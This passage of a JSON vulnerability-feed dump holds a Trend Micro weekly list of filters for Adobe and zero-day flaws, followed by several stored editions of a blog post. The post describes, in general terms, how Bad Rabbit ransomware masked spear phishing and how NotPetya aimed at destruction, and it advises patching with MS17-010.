CVEs in macOS, iOS, watchOS, tvOS, iTunes for Windows, Safari, and iCloud for Windows. 35 percent of the CVEs were submitted to Apple via our Zero Day Initiative (ZDI) bug bounty program, with a number of them initially disclosed during our Pwn2Own contest held earlier this year.\n\nFor more information on these vulnerabilities, check out the ZDI blog here: <https://www.zerodayinitiative.com/blog/2017/5/15/the-may-2017-apple-security-update-review>.\n\n**Adobe Security Updates**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Adobe updates released on or before May 16, 2017. The following table maps Digital Vaccine filters to the Adobe updates. 
You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [May 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/5/5/the-may-2017-security-update-review>):\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter #** \n---|---|--- \nAPSB17-15 | CVE-2017-3068 | 28215 \nAPSB17-15 | CVE-2017-3069 | 28222 \nAPSB17-15 | CVE-2017-3070 | 28224 \nAPSB17-15 | CVE-2017-3071 | 28225 \nAPSB17-15 | CVE-2017-3072 | 28217 \nAPSB17-15 | CVE-2017-3073 | 27830 \nAPSB17-15 | CVE-2017-3074 | 27831 \n \n \n\n**Zero-Day Filters**\n\nThere are 12 new zero-day filters covering six vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (2)_**\n\n| \n\n * 28216: ZDI-CAN-4568: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28218: ZDI-CAN-4562: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)**_ _** \n---|--- \n| \n \n**_Apple (1)_**\n\n| \n\n * 28288: ZDI-CAN-4711: Zero Day Initiative Vulnerability (Apple Safari)**_ _** \n---|--- \n| \n \n**_Dell (1)_**\n\n| \n\n * 28230: ZDI-CAN-4754: Zero Day Initiative Vulnerability (Dell EMC VNX Monitoring and Reporting)**_ _** \n---|--- \n| \n \n**_Hewlett Packard Enterprise (2)_**\n\n| \n\n * 28211: ZDI-CAN-4524,4563: Zero Day Initiative Vulnerability (HPE Operations Orchestration)\n * 28231: ZDI-CAN-4758: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)**_ _** \n---|--- \n| \n \n**_Microsoft (3)_**\n\n| \n\n * 28220: ZDI-CAN-4700: Zero Day 
Initiative Vulnerability (Microsoft Windows)\n * 28226: ZDI-CAN-4708: Zero Day Initiative Vulnerability (Microsoft Windows)\n * 28227: ZDI-CAN-4713: Zero Day Initiative Vulnerability (Microsoft Windows)**_ _** \n---|--- \n| \n \n**_Trend Micro (3)_**\n\n| \n\n * 28118: HTTPS: Trend Micro SafeSync for Enterprise deviceTool.pm get_nic_device SQL Injection (ZDI-17-125)\n * 28228: ZDI-CAN-4744-4745: Zero Day Initiative Vulnerability (Trend Micro InterScan Messaging Security)\n * 28286: ZDI-CAN-4778: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-8-2017/>).", "cvelist": ["CVE-4744-4745", "CVE-2017-3068", "CVE-2017-3073", "CVE-2017-3069", "CVE-2017-3072", "CVE-2017-0144", "CVE-2017-3071", "CVE-2017-3070", "CVE-2017-0147", "CVE-2017-3074", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-15-2017/", "modified": "2017-05-19T12:00:15", "lastseen": "2017-05-19T12:47:34", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"published": "2017-11-20T16:29:06", "href": "https://blog.trendmicro.com/double-whammy-when-one-attack-masks-another-attack/", "lastseen": "2017-11-26T20:03:00", "objectVersion": "1.5", "history": [{"lastseen": "2017-11-20T18:01:36", "bulletin": {"published": "2017-11-20T16:29:06", "href": "http://blog.trendmicro.com/double-whammy-when-one-attack-masks-another-attack/", "enchantments_done": [], "lastseen": "2017-11-20T18:01:36", "history": [], "type": "trendmicroblog", "bulletinFamily": "blog", "modified": "2017-11-20T16:29:06", "enchantments": {}, "id": "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "reporter": "Trend Micro", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, 
"title": "Double Whammy: When One Attack Masks Another Attack", "objectVersion": "1.4", "cvelist": ["CVE-2017-0145"], "references": [], "description": "![What happens when one attack hides other, damaging malicious activity?](http://blog.trendmicro.com/wp-content/uploads/2017/11/What-happens-when-one-attack-hides-other-damaging-malicious-activity-_459_40167595_0_14133878_500-300x199.jpg)\n\nIn some contexts, a double whammy can mean a good thing: when your favorite team wins two games in a row, when two candy bars fall from the vending machine, etc. However, in the context of cyber security, a double whammy may translate to being attacked while still reeling from the impact of another threat.\n\nIn cyber security, many organizations focus on addressing individual weaknesses and exploitable vulnerabilities, thinking this will be enough to stop an attack. While this is sometimes true, today's hackers are much more sophisticated and determined than cyber criminals of the past. If one avenue into a target doesn't work, a hacker will keep trying until they're able to successfully breach the system. \n\nRecently, a new style of hacking has emerged, which leverages not one, but two separate malware-supported attacks. In this setup, one attack serves as a distraction, masking the malicious activities of the other malware as it flies under the radar - providing a path for additional infections, or to making off with stolen data and other intellectual property. Hackers will typically utilize particularly visible ransomware samples for the initial attack, providing an ideal distraction tool within this style of double whammy breach. This approach is something that will take place increasingly frequently into 2018. \n\nBut what, exactly, does this kind of attack look like? And how can organizations protect themselves when a double whammy cyber security instance of this kind hits their systems? 
Let's take a closer look at what happens when one attack masks another: \n\n## Bad Rabbit hides spear phishing \n\nA recent example of one attack masking another more damaging hacker activity involves Bad Rabbit. This ransomware sample first emerged in the fall of 2017 when it was used as the launch pad for the [infection of more than 200 organizations in Russia and Ukraine](<https://thehackernews.com/2017/10/bad-rabbit-ransomware.html>), The Hacker News reported. The Bad Rabbit exploit utilized an NSA exploit stolen by the Shadow Brokers hacking group, enabling it to quickly infiltrate and spread across victims' networks. \n\nOther well-known samples have recently leveraged EternalBlue - like the NotPetya ransomware, which we'll discuss a bit later. Bad Rabbit, on the other hand, used the EternalRomance RCE exploit to drive its malicious activity. This vulnerability works by exploiting a Microsoft Windows Server Message Block flaw identified as CVE-2017-0145. The vulnerability impacts the transfer of data between Windows endpoints, and enables hackers to bypass security protocols to support remote code execution. \n\nWhen the attacks first emerged, researchers found that the infection began with a drive-by download stemming from infected Russian media sites which utilized a fake Flash player to install the malware. \n\nFrom the successful infections, though, researchers quickly discovered that Bad Rabbit wasn't just a run-of-the-mill ransomware infection: The sample also [hid a powerful spear phishing campaign](<https://blog.knowbe4.com/bad-rabbit-ransomware-attack-was-hiding-a-spear-phishing-campaign>). \n\n\"[A] number of Ukrainian entities were targeted by phishing campaigns at the same time as Bad Rabbit spread,\" KnowBe4 contributor Stu Sjouwerman wrote. 
\"Those campaigns intended to compromise financial information and other sensitive data.\" \n\nIn this way, the initial Bad Rabbit ransomware was just a smoke screen for a more targeted attack seeking out valuable company data. Serhiy Demedyuk, head of the Ukrainian state cyber police, called the instances \"hybrid attacks,\" and noted that the first attack garners much of the attention, enabling the second attack to succeed with \"devastating results.\" \n\n![Brown rabbit sitting in the grass. ](https://pictures.brafton.com/x_0_0_0_14113964_800.jpg)Don't be fooled: Bad Rabbit initially appeared to leverage a Windows vulnerability, but it actually masked a powerful spear phishing attack. \n\n## NotPetya aims to destroy\n\nNotPetya also serves as a powerful example of a double whammy style attack. However, whereas Bad Rabbit masked other, malicious spear phishing activity, NotPetya appeared as a ransomware sample that just aimed to destroy, and not steal from victims' systems. \n\nThe first time many heard about this attack was when its predecessor, Petya, emerged in March of 2016, according to CSO Online contributor Josh Fruhlinger. Petya leveraged an infected email to breach victims, and then moved on to encrypting individual files, including .exe files. \n\nThen, [in June 2017, NotPetya emerged](<https://www.csoonline.com/article/3233210/ransomware/petya-ransomware-and-notpetya-malware-what-you-need-to-know-now.html>), and initially appeared like a typical ransomware infection able to spread quickly from victim to victim and network to network. Although NotPetya looked very similar to Petya - including encrypting files and displaying a notification requesting Bitcoin in exchange for returned access - NotPetya quickly set itself apart. 
\n\nFruhlinger pointed out that while Petya used an infected email, much like many ransomware samples, NotPetya was able to spread all on its own, using several different approaches to spur infection including a forced backdoor that doesn't require human interaction for successful breach. NotPetya is also capable of encrypting more files, to the point that the hard drive is inoperable. \n\nFinally, as Fruhlinger noted, NotPetya isn't actually ransomware. Its process of infection and encryption is used to mask its true intentions: destruction. \n\n\"It looks like ransomware, complete with a screen informing the victim that they can decrypt their files if they send Bitcoin to a specified wallet,\" Fruhlinger explained. \"For Petya, this screen includes an identifying code that they're supposed to send along with the ransom; the attackers use this code to figure out which victim just paid up. But on computers infected with NotPetya, this number is just randomly generated and would be of no help in identifying anything. And it turns out that in the process of encrypting the data, NotPetya damages it beyond repair.\" \n\n_\"NotPetya's process of infection and encryption is used to mask its true intentions: destruction. \"_\n\nSurprisingly, NotPetya's aim isn't to steal data and then sell this information for profit or use it for identity theft or other malicious purposes. NotPetya appears to simply want to break victims' systems, whether or not they pay the ransom. \n\n## Guarding against hybrid attacks \n\nAs hacking becomes more complex and sophisticated and attackers continually flex their skills, it's imperative that businesses are able to keep up with and protect against the latest styles of threats. 
These hybrid, or masked, attacks demonstrate the importance of having as much visibility into network activity as possible, ensuring that even if suspicious activity is detected in one area, victims aren't distracted to the point that it allows for a secondary, damaging attack. \n\nPrecautions such as end-to-end monitoring are ideal, helping to prevent malicious and suspicious commands from flying under the radar. IT leaders and decision-makers should seek out solutions that can help pinpoint activity associated with a targeted attack, and provide granular visibility across the network. [Trend Micro's Deep Discovery](<http://apac.trendmicro.com/apac/enterprise/security-risk-management/deep-discovery/index.html>) and [Connected Threat Defense](<https://www.trendmicro.com/en_us/business/technologies/connected-threat-defense.html>) can help ensure that your organization has all-encompassing security. \n\nTo find out more about how Deep Discovery and Connected Threat Defense can benefit your company's security posture, contact Trend Micro today.", "viewCount": 14}, "differentElements": ["description", "href"], "edition": 1}, {"lastseen": "2017-11-22T00:01:39", "bulletin": {"published": "2017-11-20T16:29:06", "href": "https://blog.trendmicro.com/double-whammy-when-one-attack-masks-another-attack/", "enchantments_done": [], "lastseen": "2017-11-22T00:01:39", "history": [], "type": "trendmicroblog", "bulletinFamily": "blog", "modified": "2017-11-20T16:29:06", "enchantments": {}, "id": "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "reporter": "Trend Micro", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "title": "Double Whammy: When One Attack Masks Another Attack", "objectVersion": "1.4", "cvelist": ["CVE-2017-0145"], "references": [], "description": "![What happens when one attack hides other, damaging malicious 
activity?](https://blog.trendmicro.com/wp-content/uploads/2017/11/What-happens-when-one-attack-hides-other-damaging-malicious-activity-_459_40167595_0_14133878_500-300x199.jpg)\n\nIn some contexts, a double whammy can mean a good thing: when your favorite team wins two games in a row, when two candy bars fall from the vending machine, etc. However, in the context of cyber security, a double whammy may translate to being attacked while still reeling from the impact of another threat.\n\nIn cyber security, many organizations focus on addressing individual weaknesses and exploitable vulnerabilities, thinking this will be enough to stop an attack. While this is sometimes true, today's hackers are much more sophisticated and determined than cyber criminals of the past. If one avenue into a target doesn't work, a hacker will keep trying until they're able to successfully breach the system. \n\nRecently, a new style of hacking has emerged, which leverages not one, but two separate malware-supported attacks. In this setup, one attack serves as a distraction, masking the malicious activities of the other malware as it flies under the radar - providing a path for additional infections, or to making off with stolen data and other intellectual property. Hackers will typically utilize particularly visible ransomware samples for the initial attack, providing an ideal distraction tool within this style of double whammy breach. This approach is something that will take place increasingly frequently into 2018. \n\nBut what, exactly, does this kind of attack look like? And how can organizations protect themselves when a double whammy cyber security instance of this kind hits their systems? Let's take a closer look at what happens when one attack masks another: \n\n## Bad Rabbit hides spear phishing \n\nA recent example of one attack masking another more damaging hacker activity involves Bad Rabbit. 
This ransomware sample first emerged in the fall of 2017 when it was used as the launch pad for the [infection of more than 200 organizations in Russia and Ukraine](<https://thehackernews.com/2017/10/bad-rabbit-ransomware.html>), The Hacker News reported. The Bad Rabbit exploit utilized an NSA exploit stolen by the Shadow Brokers hacking group, enabling it to quickly infiltrate and spread across victims' networks. \n\nOther well-known samples have recently leveraged EternalBlue - like the NotPetya ransomware, which we'll discuss a bit later. Bad Rabbit, on the other hand, used the EternalRomance RCE exploit to drive its malicious activity. This vulnerability works by exploiting a Microsoft Windows Server Message Block flaw identified as CVE-2017-0145. The vulnerability impacts the transfer of data between Windows endpoints, and enables hackers to bypass security protocols to support remote code execution. \n\nWhen the attacks first emerged, researchers found that the infection began with a drive-by download stemming from infected Russian media sites which utilized a fake Flash player to install the malware. \n\nFrom the successful infections, though, researchers quickly discovered that Bad Rabbit wasn't just a run-of-the-mill ransomware infection: The sample also [hid a powerful spear phishing campaign](<https://blog.knowbe4.com/bad-rabbit-ransomware-attack-was-hiding-a-spear-phishing-campaign>). \n\n\"[A] number of Ukrainian entities were targeted by phishing campaigns at the same time as Bad Rabbit spread,\" KnowBe4 contributor Stu Sjouwerman wrote. \"Those campaigns intended to compromise financial information and other sensitive data.\" \n\nIn this way, the initial Bad Rabbit ransomware was just a smoke screen for a more targeted attack seeking out valuable company data. 
Serhiy Demedyuk, head of the Ukrainian state cyber police, called the instances \"hybrid attacks,\" and noted that the first attack garners much of the attention, enabling the second attack to succeed with \"devastating results.\" \n\n![Brown rabbit sitting in the grass. ](https://pictures.brafton.com/x_0_0_0_14113964_800.jpg)Don't be fooled: Bad Rabbit initially appeared to leverage a Windows vulnerability, but it actually masked a powerful spear phishing attack. \n\n## NotPetya aims to destroy\n\nNotPetya also serves as a powerful example of a double whammy style attack. However, whereas Bad Rabbit masked other, malicious spear phishing activity, NotPetya appeared as a ransomware sample that just aimed to destroy, and not steal from victims' systems. \n\nThe first time many heard about this attack was when its predecessor, Petya, emerged in March of 2016, according to CSO Online contributor Josh Fruhlinger. Petya leveraged an infected email to breach victims, and then moved on to encrypting individual files, including .exe files. \n\nThen, [in June 2017, NotPetya emerged](<https://www.csoonline.com/article/3233210/ransomware/petya-ransomware-and-notpetya-malware-what-you-need-to-know-now.html>), and initially appeared like a typical ransomware infection able to spread quickly from victim to victim and network to network. Although NotPetya looked very similar to Petya - including encrypting files and displaying a notification requesting Bitcoin in exchange for returned access - NotPetya quickly set itself apart. \n\nFruhlinger pointed out that while Petya used an infected email, much like many ransomware samples, NotPetya was able to spread all on its own, using several different approaches to spur infection including a forced backdoor that doesn't require human interaction for successful breach. NotPetya is also capable of encrypting more files, to the point that the hard drive is inoperable. \n\nFinally, as Fruhlinger noted, NotPetya isn't actually ransomware. 
Its process of infection and encryption is used to mask its true intentions: destruction. \n\n\"It looks like ransomware, complete with a screen informing the victim that they can decrypt their files if they send Bitcoin to a specified wallet,\" Fruhlinger explained. \"For Petya, this screen includes an identifying [code] that they're supposed to send along with the ransom; the attackers use this code to figure out which victim just paid up. But on computers infected with NotPetya, this number is just randomly generated and would be of no help in identifying anything. And it turns out that in the process of encrypting the data, NotPetya damages it beyond repair.\" \n\n_\"NotPetya's process of infection and encryption is used to mask its true intentions: destruction. \"_\n\nSurprisingly, NotPetya's aim isn't to steal data and then sell this information for profit or use it for identity theft or other malicious purposes. NotPetya appears to simply want to break victims' systems, whether or not they pay the ransom. \n\n## Guarding against hybrid attacks \n\nAs hacking becomes more complex and sophisticated and attackers continually flex their skills, it's imperative that businesses are able to keep up with and protect against the latest styles of threats. These hybrid, or masked, attacks demonstrate the importance of having as much visibility into network activity as possible, ensuring that even when suspicious activity is detected in one area, defenders aren't distracted to the point that a secondary, more damaging attack goes unnoticed. \n\nThe basics still matter: the SMB flaws exploited by EternalRomance (CVE-2017-0145) and EternalBlue, which Bad Rabbit and NotPetya respectively used to move laterally, are both addressed by Microsoft's MS17-010 security update, so hosts that had applied it were not exposed to that spreading technique. Beyond patching, precautions such as end-to-end monitoring are ideal, helping to prevent malicious and suspicious commands from flying under the radar. IT leaders and decision-makers should seek out solutions that can help pinpoint activity associated with a targeted attack and provide granular visibility across the network. 
[Trend Micro's Deep Discovery](<http://apac.trendmicro.com/apac/enterprise/security-risk-management/deep-discovery/index.html>) and [Connected Threat Defense](<https://www.trendmicro.com/en_us/business/technologies/connected-threat-defense.html>) can help ensure that your organization has all-encompassing security. \n\nTo find out more about how Deep Discovery and Connected Threat Defense can benefit your company's security posture, contact Trend Micro today.", "viewCount": 14}, "differentElements": ["description", "href"], "edition": 2}, {"lastseen": "2017-11-22T16:01:53", "bulletin": {"published": "2017-11-20T16:29:06", "href": "http://blog.trendmicro.com/double-whammy-when-one-attack-masks-another-attack/", "enchantments_done": [], "lastseen": "2017-11-22T16:01:53", "history": [], "type": "trendmicroblog", "bulletinFamily": "blog", "modified": "2017-11-20T16:29:06", "enchantments": {}, "id": "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "reporter": "Trend Micro", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "title": "Double Whammy: When One Attack Masks Another Attack", "objectVersion": "1.4", "cvelist": ["CVE-2017-0145"], "references": [], "description": "![What happens when one attack hides other, damaging malicious activity?](http://blog.trendmicro.com/wp-content/uploads/2017/11/What-happens-when-one-attack-hides-other-damaging-malicious-activity-_459_40167595_0_14133878_500-300x199.jpg)\n\nIn some contexts, a double whammy can mean a good thing: when your favorite team wins two games in a row, when two candy bars fall from the vending machine, etc. However, in the context of cyber security, a double whammy may translate to being attacked while still reeling from the impact of another threat.\n\nIn cyber security, many organizations focus on addressing individual weaknesses and exploitable vulnerabilities, thinking this will be enough to stop an attack. 
While this is sometimes true, today's hackers are much more sophisticated and determined than cyber criminals of the past. If one avenue into a target doesn't work, a hacker will keep trying until they're able to successfully breach the system. \n\nRecently, a new style of hacking has emerged, which leverages not one, but two separate malware-supported attacks. In this setup, one attack serves as a distraction, masking the malicious activities of the other malware as it flies under the radar - providing a path for additional infections, or for making off with stolen data and other intellectual property. Hackers will typically utilize particularly visible ransomware samples for the initial attack, providing an ideal distraction tool within this style of double whammy breach. This approach is likely to be used increasingly frequently into 2018. \n\nBut what, exactly, does this kind of attack look like? And how can organizations protect themselves when a double whammy cyber security incident of this kind hits their systems? Let's take a closer look at what happens when one attack masks another: \n\n## Bad Rabbit hides spear phishing \n\nA recent example of one attack masking another more damaging hacker activity involves Bad Rabbit. This ransomware sample first emerged in the fall of 2017 when it was used as the launch pad for the [infection of more than 200 organizations in Russia and Ukraine](<https://thehackernews.com/2017/10/bad-rabbit-ransomware.html>), The Hacker News reported. The Bad Rabbit malware utilized an NSA exploit leaked by the Shadow Brokers hacking group, enabling it to quickly infiltrate and spread laterally across victims' networks. \n\nOther well-known samples have recently leveraged EternalBlue - like the NotPetya ransomware, which we'll discuss a bit later. Bad Rabbit, on the other hand, used the EternalRomance RCE exploit to drive its lateral movement. 
That exploit targets a flaw in Microsoft Windows Server Message Block (SMB) identified as CVE-2017-0145. The vulnerability lies in the Windows SMB service that handles data transfer between Windows hosts, and it lets an unauthenticated remote attacker bypass security controls and achieve remote code execution. \n\nWhen the attacks first emerged, researchers found that the infection began with a drive-by download stemming from compromised Russian media sites, which served a fake Flash Player update to install the malware. \n\nFrom the successful infections, though, researchers quickly discovered that Bad Rabbit wasn't just a run-of-the-mill ransomware infection: The sample also [hid a powerful spear phishing campaign](<https://blog.knowbe4.com/bad-rabbit-ransomware-attack-was-hiding-a-spear-phishing-campaign>). \n\n\"[A] number of Ukrainian entities were targeted by phishing campaigns at the same time as Bad Rabbit spread,\" KnowBe4 contributor Stu Sjouwerman wrote. \"Those campaigns intended to compromise financial information and other sensitive data.\" \n\nIn this way, the initial Bad Rabbit ransomware was just a smoke screen for a more targeted attack seeking out valuable company data. Serhiy Demedyuk, head of the Ukrainian state cyber police, called the instances \"hybrid attacks,\" and noted that the first attack garners much of the attention, enabling the second attack to succeed with \"devastating results.\" \n\n![Brown rabbit sitting in the grass. ](https://pictures.brafton.com/x_0_0_0_14113964_800.jpg)Don't be fooled: Bad Rabbit initially appeared to be just another ransomware outbreak leveraging a Windows vulnerability, but it actually masked a powerful spear phishing attack. \n\n## NotPetya aims to destroy\n\nNotPetya also serves as a powerful example of a double whammy style attack. However, whereas Bad Rabbit masked other, malicious spear phishing activity, NotPetya appeared as a ransomware sample that just aimed to destroy, and not steal from victims' systems. 
\n\nThe first time many heard about this attack was when its predecessor, Petya, emerged in March of 2016, according to CSO Online contributor Josh Fruhlinger. Petya leveraged a malicious email to breach victims, and then moved on to encrypting individual files, including .exe files. \n\nThen, [in June 2017, NotPetya emerged](<https://www.csoonline.com/article/3233210/ransomware/petya-ransomware-and-notpetya-malware-what-you-need-to-know-now.html>), and initially appeared like a typical ransomware infection able to spread quickly from victim to victim and network to network. Although NotPetya looked very similar to Petya - including encrypting files and displaying a notification requesting Bitcoin in exchange for returned access - NotPetya quickly set itself apart. \n\nFruhlinger pointed out that while Petya relied on a malicious email, much like many ransomware samples, NotPetya was able to spread all on its own, using several different approaches to propagate - including the EternalBlue SMB exploit, which requires no human interaction for a successful breach. NotPetya also encrypts more of the system, to the point that the hard drive is rendered inoperable. \n\nFinally, as Fruhlinger noted, NotPetya isn't actually ransomware. Its process of infection and encryption is used to mask its true intentions: destruction. \n\n\"It looks like ransomware, complete with a screen informing the victim that they can decrypt their files if they send Bitcoin to a specified wallet,\" Fruhlinger explained. \"For Petya, this screen includes an identifying [code] that they're supposed to send along with the ransom; the attackers use this code to figure out which victim just paid up. But on computers infected with NotPetya, this number is just randomly generated and would be of no help in identifying anything. 
And it turns out that in the process of encrypting the data, NotPetya damages it beyond repair.\" \n\n_\"NotPetya's process of infection and encryption is used to mask its true intentions: destruction. \"_\n\nSurprisingly, NotPetya's aim isn't to steal data and then sell this information for profit or use it for identity theft or other malicious purposes. NotPetya appears to simply want to break victims' systems, whether or not they pay the ransom. \n\n## Guarding against hybrid attacks \n\nAs hacking becomes more complex and sophisticated and attackers continually flex their skills, it's imperative that businesses are able to keep up with and protect against the latest styles of threats. These hybrid, or masked, attacks demonstrate the importance of having as much visibility into network activity as possible, ensuring that even when suspicious activity is detected in one area, defenders aren't distracted to the point that a secondary, more damaging attack goes unnoticed. \n\nThe basics still matter: the SMB flaws exploited by EternalRomance (CVE-2017-0145) and EternalBlue, which Bad Rabbit and NotPetya respectively used to move laterally, are both addressed by Microsoft's MS17-010 security update, so hosts that had applied it were not exposed to that spreading technique. Beyond patching, precautions such as end-to-end monitoring are ideal, helping to prevent malicious and suspicious commands from flying under the radar. IT leaders and decision-makers should seek out solutions that can help pinpoint activity associated with a targeted attack and provide granular visibility across the network. [Trend Micro's Deep Discovery](<http://apac.trendmicro.com/apac/enterprise/security-risk-management/deep-discovery/index.html>) and [Connected Threat Defense](<https://www.trendmicro.com/en_us/business/technologies/connected-threat-defense.html>) can help ensure that your organization has all-encompassing security. 
\n\nTo find out more about how Deep Discovery and Connected Threat Defense can benefit your company's security posture, contact Trend Micro today.", "viewCount": 15}, "differentElements": ["description", "href"], "edition": 3}, {"lastseen": "2017-11-22T18:01:25", "bulletin": {"published": "2017-11-20T16:29:06", "href": "https://blog.trendmicro.com/double-whammy-when-one-attack-masks-another-attack/", "enchantments_done": [], "lastseen": "2017-11-22T18:01:25", "history": [], "type": "trendmicroblog", "bulletinFamily": "blog", "modified": "2017-11-20T16:29:06", "enchantments": {}, "id": "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "reporter": "Trend Micro", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "title": "Double Whammy: When One Attack Masks Another Attack", "objectVersion": "1.4", "cvelist": ["CVE-2017-0145"], "references": [], "description": "![What happens when one attack hides other, damaging malicious activity?](https://blog.trendmicro.com/wp-content/uploads/2017/11/What-happens-when-one-attack-hides-other-damaging-malicious-activity-_459_40167595_0_14133878_500-300x199.jpg)\n\nIn some contexts, a double whammy can mean a good thing: when your favorite team wins two games in a row, when two candy bars fall from the vending machine, etc. However, in the context of cyber security, a double whammy may translate to being attacked while still reeling from the impact of another threat.\n\nIn cyber security, many organizations focus on addressing individual weaknesses and exploitable vulnerabilities, thinking this will be enough to stop an attack. While this is sometimes true, today's hackers are much more sophisticated and determined than cyber criminals of the past. If one avenue into a target doesn't work, a hacker will keep trying until they're able to successfully breach the system. 
\n\nRecently, a new style of hacking has emerged, which leverages not one, but two separate malware-supported attacks. In this setup, one attack serves as a distraction, masking the malicious activities of the other malware as it flies under the radar - providing a path for additional infections, or for making off with stolen data and other intellectual property. Hackers will typically utilize particularly visible ransomware samples for the initial attack, providing an ideal distraction tool within this style of double whammy breach. This approach is likely to be used increasingly frequently into 2018. \n\nBut what, exactly, does this kind of attack look like? And how can organizations protect themselves when a double whammy cyber security incident of this kind hits their systems? Let's take a closer look at what happens when one attack masks another: \n\n## Bad Rabbit hides spear phishing \n\nA recent example of one attack masking another more damaging hacker activity involves Bad Rabbit. This ransomware sample first emerged in the fall of 2017 when it was used as the launch pad for the [infection of more than 200 organizations in Russia and Ukraine](<https://thehackernews.com/2017/10/bad-rabbit-ransomware.html>), The Hacker News reported. The Bad Rabbit malware utilized an NSA exploit leaked by the Shadow Brokers hacking group, enabling it to quickly infiltrate and spread laterally across victims' networks. \n\nOther well-known samples have recently leveraged EternalBlue - like the NotPetya ransomware, which we'll discuss a bit later. Bad Rabbit, on the other hand, used the EternalRomance RCE exploit to drive its lateral movement. That exploit targets a flaw in Microsoft Windows Server Message Block (SMB) identified as CVE-2017-0145. The vulnerability lies in the Windows SMB service that handles data transfer between Windows hosts, and it lets an unauthenticated remote attacker bypass security controls and achieve remote code execution. 
\n\nWhen the attacks first emerged, researchers found that the infection began with a drive-by download stemming from compromised Russian media sites, which served a fake Flash Player update to install the malware. \n\nFrom the successful infections, though, researchers quickly discovered that Bad Rabbit wasn't just a run-of-the-mill ransomware infection: The sample also [hid a powerful spear phishing campaign](<https://blog.knowbe4.com/bad-rabbit-ransomware-attack-was-hiding-a-spear-phishing-campaign>). \n\n\"[A] number of Ukrainian entities were targeted by phishing campaigns at the same time as Bad Rabbit spread,\" KnowBe4 contributor Stu Sjouwerman wrote. \"Those campaigns intended to compromise financial information and other sensitive data.\" \n\nIn this way, the initial Bad Rabbit ransomware was just a smoke screen for a more targeted attack seeking out valuable company data. Serhiy Demedyuk, head of the Ukrainian state cyber police, called the instances \"hybrid attacks,\" and noted that the first attack garners much of the attention, enabling the second attack to succeed with \"devastating results.\" \n\n![Brown rabbit sitting in the grass. ](https://pictures.brafton.com/x_0_0_0_14113964_800.jpg)Don't be fooled: Bad Rabbit initially appeared to be just another ransomware outbreak leveraging a Windows vulnerability, but it actually masked a powerful spear phishing attack. \n\n## NotPetya aims to destroy\n\nNotPetya also serves as a powerful example of a double whammy style attack. However, whereas Bad Rabbit masked other, malicious spear phishing activity, NotPetya appeared as a ransomware sample that just aimed to destroy, and not steal from victims' systems. \n\nThe first time many heard about this attack was when its predecessor, Petya, emerged in March of 2016, according to CSO Online contributor Josh Fruhlinger. Petya leveraged a malicious email to breach victims, and then moved on to encrypting individual files, including .exe files. 
\n\nThen, [in June 2017, NotPetya emerged](<https://www.csoonline.com/article/3233210/ransomware/petya-ransomware-and-notpetya-malware-what-you-need-to-know-now.html>), and initially appeared like a typical ransomware infection able to spread quickly from victim to victim and network to network. Although NotPetya looked very similar to Petya - including encrypting files and displaying a notification requesting Bitcoin in exchange for returned access - NotPetya quickly set itself apart. \n\nFruhlinger pointed out that while Petya relied on a malicious email, much like many ransomware samples, NotPetya was able to spread all on its own, using several different approaches to propagate - including the EternalBlue SMB exploit, which requires no human interaction for a successful breach. NotPetya also encrypts more of the system, to the point that the hard drive is rendered inoperable. \n\nFinally, as Fruhlinger noted, NotPetya isn't actually ransomware. Its process of infection and encryption is used to mask its true intentions: destruction. \n\n\"It looks like ransomware, complete with a screen informing the victim that they can decrypt their files if they send Bitcoin to a specified wallet,\" Fruhlinger explained. \"For Petya, this screen includes an identifying [code] that they're supposed to send along with the ransom; the attackers use this code to figure out which victim just paid up. But on computers infected with NotPetya, this number is just randomly generated and would be of no help in identifying anything. And it turns out that in the process of encrypting the data, NotPetya damages it beyond repair.\" \n\n_\"NotPetya's process of infection and encryption is used to mask its true intentions: destruction. \"_\n\nSurprisingly, NotPetya's aim isn't to steal data and then sell this information for profit or use it for identity theft or other malicious purposes. NotPetya appears to simply want to break victims' systems, whether or not they pay the ransom. 
